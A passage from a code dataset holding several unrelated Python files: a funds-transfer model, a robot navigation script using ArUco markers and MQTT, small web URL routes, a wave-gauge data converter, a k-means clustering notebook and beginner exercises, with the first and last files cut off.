app.core.init import GET_FUNDS, INSERT_TRANSFER\nfrom app.core.models.adapters import xrates\n\n\nclass Transfer:\n @classmethod\n async def get_funds(cls, app, payer, amount: Decimal) -> Decimal:\n \"\"\" Получить остаток \"\"\"\n debt_credt = Decimal('0.0000')\n async with app['pg'].acquire() as pgcon:\n async with pgcon.cursor() as c:\n await c.execute(GET_FUNDS, ({'payer_id': payer[1], 'currency': payer[2]}))\n debt_credt = await c.fetchone()\n debt_credt = debt_credt[0]\n debt_credt = debt_credt if debt_credt else Decimal('0.0000')\n return debt_credt\n\n @classmethod\n async def create(cls, app, payer: tuple, payee: tuple, amount_payer: Decimal, description=None) -> Decimal:\n errors = []\n async with app['pg'].acquire() as pgcon:\n async with pgcon.cursor() as c:\n try:\n await c.execute(INSERT_TRANSFER, {\n 'payer_id': payer[1],\n 'payee_id': payee[1],\n 'amount': amount_payer,\n 'currency': payer[2],\n 'description': description})\n if payer[2] != payee[2]:\n # Требуется пересчёт валют\n amount_payee = await Transfer.recalcuale_amount(amount_payer, payer[2], payee[2])\n await c.execute(INSERT_TRANSFER, {\n 'payer_id': payer[1],\n 'payee_id': payee[1],\n 'amount': amount_payee,\n 'currency': payee[2],\n 'description': description})\n except Exception as e:\n errors.append({3001: str(e)})\n return errors\n\n @staticmethod\n async def recalcuale_amount(amount: Decimal, payer_currency, payee_currency):\n rates = await xrates.parse()\n base = rates.get('base')\n payee_k = 1 if payee_currency == base else rates.get('rates', {}).get(payee_currency)\n payer_k = 1 if payer_currency == base else rates.get('rates', {}).get(payer_currency)\n if payee_k and payer_k:\n amount /= payer_k \n amount *= payee_k\n return amount.quantize(Decimal('1.0000'))","sub_path":"app/core/models/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"211827392","text":"\"\"\"\nThis is the the BOBA mosFET Mission Control script. \n\n@author: Hélène Verhaeghe\n@Coauthor (Satellite): Jerôme De Saulles \n\"\"\"\n\n#import necessary libaries\nimport cv2 # This is the vision library OpenCV\nimport numpy as np # This is a library for mathematical functions for python (used later)\nimport socket # This library will allow you to communicate over the network\nimport time # This library will allow us to access the system clock for pause/sleep/delay actions\nimport cv2.aruco as aruco #Import the AruCo library\nimport math # Import the math library\nimport itertools as it\nimport logging # This library will offer us a different method to print information on the terminal (better for debugging purposes)\nimport paho.mqtt.client as mqtt # This is the library to do the MQTT communications\nimport time # This is the library that will allow us to use the sleep function\nimport random\nimport threading\n\n\n# Initialise variables\nAngleReached = 0 #Field 4 MQTT\nDistanceReached = 0 #Field 5 MQTT\nCommandCount_A = 0 #Keeping Track of number of turning command was send to BB8\nCommandCount_D = 0 #Keeping Track of number of moving command was send to BB8\nInPosition = 0\n\nprint(\"CommandCount_A: \"+str(CommandCount_A))\nprint(\"CommandCount_D: \"+str(CommandCount_D))\n\n\n## MQTT Fields - BOBAmosFET\n# Field 1: Angle\n# Field 2: Distance\n# Field 3: Command\n# Field 4: AngleReached\n# Field 5: DistanceReached\n# Field 6: MagneticField \n# Field 7: \n# Field 8: ShipHeight\n\n# Satellite functions\n\ndef rotationMatrixToEulerAngles(R) :\n\n sy = math.sqrt(R[0,0] * R[0,0] + R[1,0] * R[1,0])\n\n singular = sy < 1e-6\n\n if not singular :\n x = math.atan2(R[2,1] , R[2,2])\n y = math.atan2(-R[2,0], sy)\n z = math.atan2(R[1,0], R[0,0])\n else :\n x = math.atan2(-R[1,2], R[1,1])\n y = math.atan2(-R[2,0], sy)\n z = 0\n\n return np.array([x, y, z])\n\ndef second_smallest(numbers):\n m1, m2 = float('inf'), float('inf')\n for x in numbers:\n if x <= m1:\n m1, m2 = x, m1\n elif x < m2:\n m2 = x\n return m2\n\ndef vision():\n\n # Load the camera calibration values\n Camera = np.load('Calibrated_Rig_Camera.npz')\n CM = Camera['CM'] # camera matrix\n dist_coef = Camera['dist_coef'] # distortion coefficients from the camera\n\n aruco_dict = aruco.Dictionary_get(\n aruco.DICT_4X4_50) # Load the aruco dictionary\n pa = aruco.DetectorParameters_create() # Set the detection parameters\n\n # Select the correct camera (0) = front camera, (1) = rear camera\n cap = cv2.VideoCapture(1)\n\n # Set the width and heigth of the camera to 640x480\n cap.set(3, 640)\n cap.set(4, 480)\n\n # Create two opencv named windows\n cv2.namedWindow(\"frame-image\", cv2.WINDOW_AUTOSIZE)\n\n # Position the window\n cv2.moveWindow(\"frame-image\", 0, 0)\n\n t_end = time.time() + 1\n\n # Execute this continuously\n while time.time() < t_end:\n # Capture current frame from the camera\n ret, frame = cap.read()\n\n # Convert the image from the camera to Gray scale\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Run the detection formula\n corners, ids, rP = aruco.detectMarkers(gray, aruco_dict)\n\n # # Count the number of Arucos visible\n # try:\n # IDScount = len(ids)\n # except:\n # IDScount = 0\n\n # Calculate the pose of the markers\n rvecs, tvecs, _objPoints = aruco.estimatePoseSingleMarkers(corners, 53, CM, dist_coef) # <<<< IMPORTANT: number needs changing to width of printed arucos (in mm)\n # Draw the detected markers as an overlay\n out = aruco.drawDetectedMarkers(frame, corners, ids)\n\n # Create Coordinate Storage Arrays\n X = [] #X Coordinate Locations Array\n Y = []\n Z = []\n ID = []\n\n # Run loop if ids are detected\n if ids is not None:\n for i, id in enumerate(ids):\n # Overlay the axis on the image\n out = aruco.drawAxis(out, CM, dist_coef, rvecs[i][0][:], tvecs[i][0][:], 30)\n # Print the tvecs tranformation matrix or Aruco coordinates\n # print(\"X = {:4.1f} Y = {:4.1f} Z = {:4.1f} ID = {:2d}\".format(tvecs[i][0][0], tvecs[i][0][1], tvecs[i][0][2], ids[i][0]))\n X.append(tvecs[i][0][0])\n Y.append(tvecs[i][0][1])\n Z.append(tvecs[i][0][2])\n ID.append(ids[i][0])\n # debugTEST = []\n \n \n # Display the original frame in a window and aruco markers\n cv2.imshow('frame-image', frame)\n\n\n # If the button q is pressed in one of the windows\n if cv2.waitKey(20) & 0xFF == ord('q'):\n # Exit the While loop\n break\n\n # When everything done, release the capture\n cap.release()\n # close all windows\n cv2.destroyAllWindows()\n # # exit the kernel\n # exit(0)\n return X, Y, Z, ID, rvecs\n\ndef initialScan():\n X, Y, Z, ID, rvecs = vision()\n\n # Ensure all coordinates are +ve\n X = [abs(ele) for ele in X]\n Y = [abs(ele) for ele in Y]\n Z = [abs(ele) for ele in Z]\n\n # Combine X(0), Y(1), Z(2) coordinates and ID(3) into P (point) variables\n P = []\n ID_count = len(ID)\n for i in range(ID_count):\n P.append(\n [ID[i], X[i], Y[i], Z[i]]\n )\n # print(P)\n\n # Find the P value which corresponds to the Robot (ID = 0)\n robot_ind = [i for i, el in enumerate(P) if 0 in el][0]\n\n distance = []\n # Count the distances between the robot and the other IDs\n for i in range(ID_count):\n # print(P[i][1], P[robot_ind][1])\n distance.append(\n math.sqrt( ((P[i][1] - P[robot_ind][1]) **2) + ((P[i][2] - P[robot_ind][2]) **2) )\n ) #Compute using 2D Pythagoras\n\n # print(\"Distance vector =\", distance)\n min_distance = second_smallest(distance)\n min_ind = distance.index(min_distance)\n min_ID = P[min_ind][0]\n print(\"The nearest ID is\", min_ID)\n # print(\"The distance to ID\", min_ID, \"from the robot is\", min_distance, \"mm\")\n\n # Store the rvec's for the robot and nearest marker\n rob_rvec = rvecs[robot_ind][0][:]\n marker_rvec = rvecs[min_ind][0][:] # Replace 2 with min_ind when working properly\n output_rvecs = rvecs\n output_rvecs = np.delete(output_rvecs, robot_ind, 0)\n\n # Calculate the relative rotation about the Z axis between the robot ID and nearest ID (beta in notes)\n R_ref_to_cam = cv2.Rodrigues(rob_rvec)[0] #reference to camera\n R_test_to_cam = cv2.Rodrigues(marker_rvec)[0] #test to camera\n R_cam_to_ref = np.transpose(R_ref_to_cam) #inverse of reference to camera\n R_test_to_ref = np.matmul(R_test_to_cam,R_cam_to_ref) #test to reference\n angles_matrix = rotationMatrixToEulerAngles(R_test_to_ref) \n beta = np.degrees(angles_matrix[2])\n beta = 0 - beta\n\n # Calculate the relative angle between the Robot ID axis and the nearest ID location (sigma in notes)\n delta_x = P[robot_ind][1] - P[min_ind][1]\n delta_y = P[min_ind][2] - P[robot_ind][2]\n\n if delta_x > 0:\n if delta_y > 0:\n # upper right\n alpha = np.degrees(math.atan( (delta_x) / (delta_y) ))\n else:\n # lower right\n alpha = np.degrees(math.atan( (-1 * delta_y) / (delta_x) )) + 90\n else:\n if delta_y > 0:\n # upper left\n alpha = np.degrees(math.atan( (delta_y) / (-1 * delta_x) )) + 270\n else:\n # lower left\n alpha = np.degrees(math.atan( (-1 * delta_x) / (-1 * delta_y) )) + 180\n\n # print(\"Alpha =\", alpha, \"degrees\")\n\n # Combine beta and alpha above to calculate the movement direction needed by the robot (sigma in notes)\n angle = alpha - beta\n\n # Convert to counter clockwise motion if faster\n if angle > 180:\n angle = angle - 360\n\n # Rewrite the aruco locations with the robot location removed\n # ADD LOGICAL SORTING FUNCTION HERE TO ARRANGE ARUCOS IN ORDER THEY SHOULD BE VISITED\n arucoLocations = P\n del arucoLocations[robot_ind]\n\n return(arucoLocations, output_rvecs, angle, min_distance)\n \ndef BB8_check(target_arucoLocations, target_rvecs, tolerance):\n X, Y, Z, ID, rvecs = vision()\n\n # Ensure all coordinates are +ve\n X = [abs(ele) for ele in X]\n Y = [abs(ele) for ele in Y]\n Z = [abs(ele) for ele in Z]\n\n # Combine X(0), Y(1), Z(2) coordinates and ID(3) into P (point) variables\n P = []\n ID_count = len(ID)\n for i in range(ID_count):\n P.append(\n [ID[i], X[i], Y[i], Z[i]]\n )\n # print(P)\n\n # Find the P value which corresponds to the Robot (ID = 0)\n robot_ind = [i for i, el in enumerate(P) if 0 in el][0]\n robot_loc = P[robot_ind]\n robot_rvec = rvecs[robot_ind][0][:]\n\n distance = []\n # Count the distances between the robot and the target marker\n for i in range(len(target_arucoLocations)):\n # print(P[i][1], P[robot_ind][1])\n distance.append(\n math.sqrt( ((target_arucoLocations[i][1] - robot_loc[1]) **2) + \n ((target_arucoLocations[i][2] - robot_loc[2]) **2) )\n ) #Compute using 2D Pythagoras\n print('Distance i =', distance[i])\n\n\n # Define the acceptable tolerance from the target aruco location (in mm)\n dist_tol = tolerance\n # Logic for calculating either corrected target angle+distance or next target angle+distance\n if distance[0] < dist_tol and len(distance) == 1: # Target reached, final marker\n target_angle = 0\n target_distance = 0\n state = 1\n command = 0\n\n elif distance[0] < dist_tol and len(distance) == 2: # Target reached, move onto next marker\n # Calculate angle to next target aruco\n marker_rvec = target_rvecs[1][0][:] # Define target rvec\n\n # Calculate the relative rotation about the Z axis between the robot ID and nearest ID (beta in notes)\n R_ref_to_cam = cv2.Rodrigues(robot_rvec)[0] #reference to camera\n R_test_to_cam = cv2.Rodrigues(marker_rvec)[0] #test to camera\n R_cam_to_ref = np.transpose(R_ref_to_cam) #inverse of reference to camera\n R_test_to_ref = np.matmul(R_test_to_cam,R_cam_to_ref) #test to reference\n angles_matrix = rotationMatrixToEulerAngles(R_test_to_ref) \n beta = np.degrees(angles_matrix[2])\n beta = 0 - beta\n\n # Calculate the relative angle between the Robot ID axis and the nearest ID location (sigma in notes)\n delta_x = robot_loc[1] - target_arucoLocations[1][1]\n delta_y = target_arucoLocations[1][2] - robot_loc[2]\n if delta_x > 0:\n if delta_y > 0:\n # upper right\n alpha = np.degrees(math.atan( (delta_x) / (delta_y) ))\n else:\n # lower right\n alpha = np.degrees(math.atan( (-1 * delta_y) / (delta_x) )) + 90\n else:\n if delta_y > 0:\n # upper left\n alpha = np.degrees(math.atan( (delta_y) / (-1 * delta_x) )) + 270\n else:\n # lower left\n alpha = np.degrees(math.atan( (-1 * delta_x) / (-1 * delta_y) )) + 180\n # Combine beta and alpha above to calculate the movement direction needed by the robot (sigma in notes)\n target_angle = alpha - beta\n # Convert to counter clockwise motion if faster\n if target_angle > 180:\n target_angle = target_angle - 360\n\n # Output the target distance\n target_distance = distance[1]\n state = 1\n command = 0\n\n elif distance[0] > dist_tol: # Target missed, recalculate angle to current target\n # Calculate angle to current target aruco\n # Calculate angle to next target aruco\n marker_rvec = target_rvecs[0][0][:] # Define target rvec\n\n # Calculate the relative rotation about the Z axis between the robot ID and nearest ID (beta in notes)\n R_ref_to_cam = cv2.Rodrigues(robot_rvec)[0] #reference to camera\n R_test_to_cam = cv2.Rodrigues(marker_rvec)[0] #test to camera\n R_cam_to_ref = np.transpose(R_ref_to_cam) #inverse of reference to camera\n R_test_to_ref = np.matmul(R_test_to_cam,R_cam_to_ref) #test to reference\n angles_matrix = rotationMatrixToEulerAngles(R_test_to_ref) \n beta = np.degrees(angles_matrix[2])\n beta = 0 - beta\n\n # Calculate the relative angle between the Robot ID axis and the nearest ID location (sigma in notes)\n delta_x = robot_loc[1] - target_arucoLocations[1][1]\n delta_y = target_arucoLocations[1][2] - robot_loc[2]\n if delta_x > 0:\n if delta_y > 0:\n # upper right\n alpha = np.degrees(math.atan( (delta_x) / (delta_y) ))\n else:\n # lower right\n alpha = np.degrees(math.atan( (-1 * delta_y) / (delta_x) )) + 90\n else:\n if delta_y > 0:\n # upper left\n alpha = np.degrees(math.atan( (delta_y) / (-1 * delta_x) )) + 270\n else:\n # lower left\n alpha = np.degrees(math.atan( (-1 * delta_x) / (-1 * delta_y) )) + 180\n # Combine beta and alpha above to calculate the movement direction needed by the robot (sigma in notes)\n target_angle = alpha - beta\n # Convert to counter clockwise motion if faster\n if target_angle > 180:\n target_angle = target_angle - 360\n\n # Output the target distance\n target_distance = distance[0]\n state = 0\n command = 1\n\n\n return(state, target_angle, target_distance, command)\n\n\n# Connect to MQTT Server\n\n# After we connect we subsribe to one (or more) topics in this case the topic number 1\ndef on_connect(client,userdata,flags,rc):\n print (\"Connected with result code \"+str(rc))\n client.subscribe(MainTopic+\"4\")\n client.subscribe(MainTopic+\"5\")\n \n\n# The callback for when a PUBLISH message is received from the server. I.e. when a new value for the topic we subscribed to above updates\ndef on_message(client, userdata, msg):\n global Check\n global InPosition\n global TargetAngle\n global TargetDistance\n global CommandCount_A\n global CommandCount_D\n global Command\n \n print(str(time.time())+\" In topic: \"+msg.topic+\" the value was \"+ str(int(msg.payload.rstrip(b'\\x00'))))\n\n \n data = int(msg.payload.rstrip(b'\\x00'))\n\n if msg.topic == \"BOBAmosFET/4\":\n \n AngleReached = data\n \n if AngleReached == CommandCount_A + 1:\n \n Command = 2 #Satellite Function output\n print(\"Command value change to \"+str(Command))\n\n CommandCount_A = CommandCount_A + 1 # Set to next command index\n print(\"CommandCount_A: \"+str(CommandCount_A))\n\n elif msg.topic == \"BOBAmosFET/5\":\n \n DistanceReached = data\n \n if DistanceReached == CommandCount_D + 1:\n\n Check = 1 \n print(\"Check value change to \"+str(Check))\n\n InPosition, TargetAngle, TargetDistance, Command = BB8_check(target_arucoLocations, target_rvecs, tolerance)\n #print('InPosition, TargetAngle and TargetDistance =', InPosition, TargetAngle, TargetDistance)\n\n \n print(\"InPosition value change to \"+str(InPosition))\n #TargetAngle = 0 #Satellite Function output\n print(\"TargetAngle value change to \"+str(TargetAngle))\n #TargetDistance = 0 #Satellite Function output\n print(\"TargetDistance value change to \"+str(TargetDistance))\n #Command = 3 #Satellite Function output\n print(\"Command value change to \"+str(Command))\n\n CommandCount_D= CommandCount_D + 1 # Set to next command index\n print(\"CommandCount_D: \"+str(CommandCount_D))\n #else:\n #pass \n\n# Create the mqtt client object\nclient = mqtt.Client() \n# Assign the function for the connection event\nclient.on_connect = on_connect\n# Assign the function for the new message event\nclient.on_message = on_message\n\n# Set the username and password\nclient.username_pw_set(\"student\",password=\"smartPass\")\n\n# Connect to the server using a specific port with a timeout delay (in seconds)\nclient.connect(\"ec2-3-10-235-26.eu-west-2.compute.amazonaws.com\",31415,60)\n\n# Create your main topic string. Everything else should be fields with values 1-8\nMainTopic = \"BOBAmosFET/\"\n\n# Start the client\nclient.loop_start() \n\n################################ START ################################\n\n############################# INITIAL MODE ##############################\n\n### Send Command to Mill.Falcon ###\n\n# Generate random number between 0 and 10\nshipHeight = random.randint(0, 10)\n#print(\"Random integer from 0 to 10\")\n#print(\"Random integer: \", shipHeight)\n\n\n# Publish the value (integer) as a string. All messages are strings\nclient.publish(MainTopic+\"8\",str(shipHeight))\n# Plot in the terminal what we just did\nprint(\"%s %d\" % (MainTopic+\"8\", shipHeight))\n\n\n### Initial Scan ### \n\n#TargetAngle = 45\n#TargetDistance = 100 \narucoLocations, arucoRvecs, TargetAngle, TargetDistance = initialScan()\n#arucoRvecs = [[[-2.65077743, 0.01517437, 0.0167672 ]],[[ 3.45453988, -0.04192978, 0.42548113]]]\n#arucoLocations = [[11, 27.951521361774212, 88.53147453041412, 682.1787133172342], [13, 107.79970108395187, 105.40086628164487, 742.4444729628245]]\n\nfor i,_ in enumerate(arucoLocations):\n\n if i < len(arucoLocations)-1:\n\n target_arucoLocations = [[]]\n target_arucoLocations[i][:] = arucoLocations[i][:]\n target_arucoLocations.append(arucoLocations[i+1][:])\n print('target_arucoLocations =', target_arucoLocations)\n\n target_rvecs = np.array([[arucoRvecs[i][0][:]],[arucoRvecs[i+1][0][:]] ])\n # print('target_rvecs =', target_rvecs)\n tolerance = 50 # Distance tolerance to target aruco (in mm)\n\n else:\n target_arucoLocations = [[]]\n target_arucoLocations[i][:] = arucoLocations[i][:]\n print('target_arucoLocations =', target_arucoLocations)\n\n target_rvecs = np.array([[arucoRvecs[i][0][:]] ])\n # print('target_rvecs =', target_rvecs)\n tolerance = 50 # Distance tolerance to target aruco (in mm)\n\n InPosition = 0\n Check = 1\n Command = 1\n\n\n while InPosition < 1:\n\n ############################# TURNING MODE ##############################\n if Check == 1:\n\n print(\"Entered TURNING MODE\")\n ### Send Command to BB8\n\n Angle = TargetAngle\n Distance = 0\n\n # Publish the value (integer) as a string. All messages are strings\n client.publish(MainTopic+\"1\",str(Angle))\n client.publish(MainTopic+\"2\",str(Distance))\n client.publish(MainTopic+\"3\",str(Command))\n\n # Plot in the terminal what we just did\n print(\"%s %d\" % (MainTopic+\"1\", Angle))\n print(\"%s %d\" % (MainTopic+\"2\", Distance))\n print(\"%s %d\" % (MainTopic+\"3\", Command))\n\n Command = 0\n Check = 0\n \n \n ### 3. Wait for a signal from BB8. Once signal received, go to MOVING MODEs\n while Command == 0:\n print(\"waiting for a signal from BB8\")\n pass\n\n ############################# MOVING MODE ##############################\n print(\"Entered MOVING MODE\")\n if Command == 2:\n ### Send Command to BB8\n \n Angle = 0\n Distance = TargetDistance\n\n # Publish the value (integer) as a string. All messages are strings\n client.publish(MainTopic+\"1\",str(Angle))\n client.publish(MainTopic+\"2\",str(Distance))\n client.publish(MainTopic+\"3\",str(Command))\n\n # Plot in the terminal what we just did\n print(\"%s %d\" % (MainTopic+\"1\", Angle))\n print(\"%s %d\" % (MainTopic+\"2\", Distance))\n print(\"%s %d\" % (MainTopic+\"3\", Command))\n\n Command = 0\n ### 3. Once signal from BB8, position-check function will be triggered within on_message\n \n while Command == 0:\n print(\"waiting for a signal from BB8\")\n pass\n \n\n ############################# DETECTING MODE ##############################\n print(\"Entered DETECTING MODE\")\n\n\n\n\n\nclient.loop_stop()\n# Disconnect\nclient.disconnect()\n","sub_path":"MissionControl/Mechatronic-Project-Satellite/MissionControlTest2_SAT.py","file_name":"MissionControlTest2_SAT.py","file_ext":"py","file_size_in_byte":20670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"521220773","text":"# -*- coding: utf-8 -*-\nimport web\nfrom .models.todos import Todo, TodoTag\ndb = web.extensions.db\n\napp_jslink = ''\napp_desc = '待办列表'\n\ndb.create_all()\n\nurls = [\n \"/todos\", Todo,\n \"/todos/([^/]+)\", Todo,\n \"/tags\", TodoTag,\n \"/tags/([^/]+)\", TodoTag,\n ]\n","sub_path":"todo/appmain.py","file_name":"appmain.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"77564602","text":"import csv\nfrom numpy.linalg import norm\nfrom scipy import *\nfrom pylab import plot, show, legend,xlim,ylim,savefig,title,xlabel,ylabel,clf, loglog\nimport os\n\nwdatadir = \"../../../../../data/raw/P1P2P3/Beji/\"\nsdatadir = \"../../../../../data/postprocessing/Beji94FEM/o2/\"\nexp = \"sl\"\nwdir = wdatadir + exp+ \"/\"\nsexpdir = sdatadir + exp + \"/\"\n\nendt = 60\nbegt = 40 \nnts = []\nnwg1s = []\nnwg2s = []\nnwg3s = []\nnwg4s = []\nnwg5s = []\nnwg6s = []\nnwg7s = []\n\ns = wdir + \"NumWaveGauge.txt\"\nwith open(s,'r') as file1:\n readfile = csv.reader(file1, delimiter = ',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n j = -1\n for row in readfile: \n if (j >= 0):\n nts.append(float(row[0]))\n nwg1s.append(float(row[1]))\n nwg2s.append(float(row[2]))\n nwg3s.append(float(row[3]))\n nwg4s.append(float(row[4]))\n nwg5s.append(float(row[5]))\n nwg6s.append(float(row[6]))\n nwg7s.append(float(row[7]))\n \n \n j = j + 1\n \n\nets = []\newg1s = []\newg2s = []\newg3s = []\newg4s = []\newg5s = []\newg6s = []\newg7s = [] \ns = wdir + \"WaveGauge.txt\"\nwith open(s,'r') as file1:\n readfile = csv.reader(file1, delimiter = ',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n j = -1\n for row in readfile: \n if (j >= 0):\n ets.append(float(row[0]))\n ewg1s.append(float(row[1]))\n ewg2s.append(float(row[2]))\n ewg3s.append(float(row[3]))\n ewg4s.append(float(row[4]))\n ewg5s.append(float(row[5]))\n ewg6s.append(float(row[6]))\n ewg7s.append(float(row[7]))\n \n \n j = j + 1\n\nets0 = ets[1]\n\nendtei = int(endt/ets[1]) + 1 \nbegtei = int(begt/ets[1]) - 1\nets = array(ets[begtei:endtei])\newg1s = array(ewg1s[begtei:endtei])*100\newg2s = array(ewg2s[begtei:endtei])*100\newg3s = array(ewg3s[begtei:endtei])*100\newg4s = array(ewg4s[begtei:endtei])*100\newg5s = array(ewg5s[begtei:endtei])*100\newg6s = array(ewg6s[begtei:endtei])*100\newg7s = array(ewg7s[begtei:endtei])*100\n\n \nExpCom = []\nExpCom.append(ets)\nExpCom.append(ewg1s)\nExpCom.append(ewg2s)\nExpCom.append(ewg3s)\nExpCom.append(ewg4s)\nExpCom.append(ewg5s)\nExpCom.append(ewg6s)\nExpCom.append(ewg7s)\n\n\nmult = int(ets0/nts[1])\nendtni = int(endt/nts[1]) + 1\nbegtni = int(begt/nts[1]) - 1 \n\nnts = array(nts[begtni:endtni:mult])\nnwg1s = (array(nwg1s[begtni:endtni:mult])-0.4)*100\nnwg2s = array(nwg2s[begtni:endtni:mult])*100\nnwg3s = array(nwg3s[begtni:endtni:mult])*100\nnwg4s = array(nwg4s[begtni:endtni:mult])*100\nnwg5s = array(nwg5s[begtni:endtni:mult])*100\nnwg6s = array(nwg6s[begtni:endtni:mult])*100\nnwg7s = array(nwg7s[begtni:endtni:mult])*100\n \n \nNumCom = []\nNumCom.append(nts)\nNumCom.append(nwg1s)\nNumCom.append(nwg2s)\nNumCom.append(nwg3s)\nNumCom.append(nwg4s)\nNumCom.append(nwg5s)\nNumCom.append(nwg6s)\nNumCom.append(nwg7s)\n\n\nnc = len(NumCom)\n\nfor j in range(1,nc):\n sdir = sexpdir +\"WaveGauge\" + str(j) + \"/\"\n if not os.path.exists(sdir):\n os.makedirs(sdir)\n nn = len(nts) \n s = sdir + \"Numerical.dat\"\n with open(s,'w') as file1:\n for i in range(nn):\n s =\"%3.8f%5s%1.15f\\n\" %(NumCom[0][i],\" \",NumCom[j][i])\n file1.write(s)\n ne = len(ets) \n s = sdir + \"Experimental.dat\"\n with open(s,'w') as file1:\n for i in range(ne):\n s =\"%3.8f%5s%1.15f\\n\" %(ExpCom[0][i],\" \",ExpCom[j][i])\n file1.write(s)\n ","sub_path":"CODE/postprocessing/readplot/Beji/94CSV2DAT.py","file_name":"94CSV2DAT.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"622332001","text":"def swap_case(s):\n a = []\n for i in list(s):\n j = ''\n if i.isupper():\n j = i.lower()\n elif i.islower():\n j = i.upper()\n else:\n a.append(i)\n a.append(j)\n\n\n return ''.join(a)\n\nif __name__ == '__main__':\n s = input()\n result = swap_case(s)\n print(result)","sub_path":"swap_case.py","file_name":"swap_case.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"158421189","text":"from __future__ import unicode_literals\nfrom django.conf.urls import url\nfrom apps.pages import views\n\n\nurlpatterns = [\n url(r'^/?$', views.pages, name='dashboard_pages'),\n url(r'^/add_page/?$', views.add_page, name='dashboard_add_page'),\n url(r'^/edit_page_(?P[0-9]+)/?$', views.edit_page, name='dashboard_edit_page'),\n url(r'^/delete_page_(?P[0-9]+)/?$', views.delete_page, name='dashboard_delete_page'),\n url(r'^/menus/?$', views.menus, name='dashboard_menus'),\n url(r'^/menus/add_menu/?$', views.add_menu, name='dashboard_add_menu'),\n url(r'^/menus/edit_menu_(?P[0-9]+)/?$', views.edit_menu, name='dashboard_edit_menu'),\n url(r'^/menus/delete_menu_(?P[0-9]+)/?$', views.delete_menu, name='dashboard_delete_menu'),\n]\n","sub_path":"apps/pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"395929481","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nfrom collections import Counter\n\n\n# In[11]:\n\n\namsterdam = pd.read_csv('datasets/amsterdam-attraction.csv')\n\namsterdam = amsterdam.dropna()\namsterdam.head()\nX=amsterdam.loc[:,['lat','lng']]\nX = X.dropna()\nX\n\n\n# In[27]:\n\n\n#run KMeans\nid_n=8\nkmeans = KMeans(n_clusters=id_n, random_state=0).fit(X)\ncluster = pd.DataFrame()\nid_label=kmeans.labels_\n\n\n# In[28]:\n\n\n#plot result\nptsymb = np.array(['b.','r.','m.','g.','c.','k.','b*','r*','m*','r^']);\nplt.figure(figsize=(12,12))\nplt.ylabel('Longitude', fontsize=12)\nplt.xlabel('Latitude', fontsize=12)\nfor i in range(id_n):\n cluster=np.where(id_label==i)[0]\n plt.plot(X.lat[cluster].values,X.lng[cluster].values,ptsymb[i])\nplt.show()\n\n\n# In[29]:\n\n\nimport math\n\ndef distance(origin, destination):\n lat1, lon1 = origin\n lat2, lon2 = destination\n radius = 6371 # km\n\n dlat = math.radians(lat2-lat1)\n dlon = math.radians(lon2-lon1)\n a = math.sin(dlat/2) * math.sin(dlat/2) + math.cos(math.radians(lat1)) * math.cos(math.radians(lat2)) * math.sin(dlon/2) * math.sin(dlon/2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))\n d = radius * c\n\n return d\n\n","sub_path":"vagary/recommend_attractions.py","file_name":"recommend_attractions.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"346687037","text":"# 별찍는 함수 만들기\ndef square(number):\n\n # 주어지는 number가 3일 때가 가장 기본 형태 \n if number == 3:\n star = ['***','* *','***']\n return star\n\n # number가 3이 아닌 3의 거듭제곱일 때 재귀함수 이용\n else:\n # 리스트 star의 길이는 number\n star = [''] * number\n \n # square(number//3)의 리스트로부터 number에 대한 star을 만들어줌\n for i, s in enumerate(square(number//3)):\n\n # 새로운 star는 square(number//3)의 3배 길이이므로 i, i+(number//3), i+(number//3)*2마다 규칙성 생김\n # star[i]와 star[i+(number//3)*2]는 s의 3배를 해준 값\n # star[i+(number//3)]은 s + (number//3)만큼의 공백 + s 의 값\n star[i] = s*3\n star[i+(number//3)] = s + ' ' * (number//3) + s\n star[i+(number//3)*2] = s*3\n\n return star\n\n\nnumber = int(input())\n\n# square(number)는 number길이 만큼의 리스트 형태이므로 요소별로 출력\nfor s in square(number):\n print(s)\n","sub_path":"code/jina/재귀/별찍기-10.py","file_name":"별찍기-10.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"425212710","text":"#!/usr/bin/env python\nimport sys, OpenGL, PySide.QtOpenGL\nsys.path += ['.']\nfrom PySide.QtCore import *\nfrom PySide.QtGui import *\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom SceneManager import SceneManager\nfrom MainWindow import MainWindow\nfrom Entities import *\nfrom Loader import Load\nfrom Utils import *\n\n\nSM = SceneManager()\nsphere = Entity()\nsphere.m_mesh = Load('model.ply')\nsphere.m_name = 'sphere1'\nsphere.m_position = vector3(0,-1,-3.8)\n\n\ncube = Entity()\ncube.m_mesh = Load('cube.ply')\ncube.m_name = 'cube1'\ncube.m_position = vector3(0.3,3,-3.6)\ncube.m_rotate = vector4(0.4,0,1,-10)\n\n\nSM.AddEntity('sphere1', sphere)\nSM.AddEntity('cube1', cube)\n\n\n\napp = QApplication(sys.argv)\nw = MainWindow(60, SM)\n\n\n\nw.mainWindow.show()\n\n\nglMatrixMode(GL_MODELVIEW)\nglLoadIdentity()\nglTranslate(sphere.m_position.x, sphere.m_position.y, sphere.m_position.z)\ntemp = glGetDoublev(GL_MODELVIEW_MATRIX)\nsphere.m_matrix1 = transPoint(sphere.m_mesh.m_vertices, 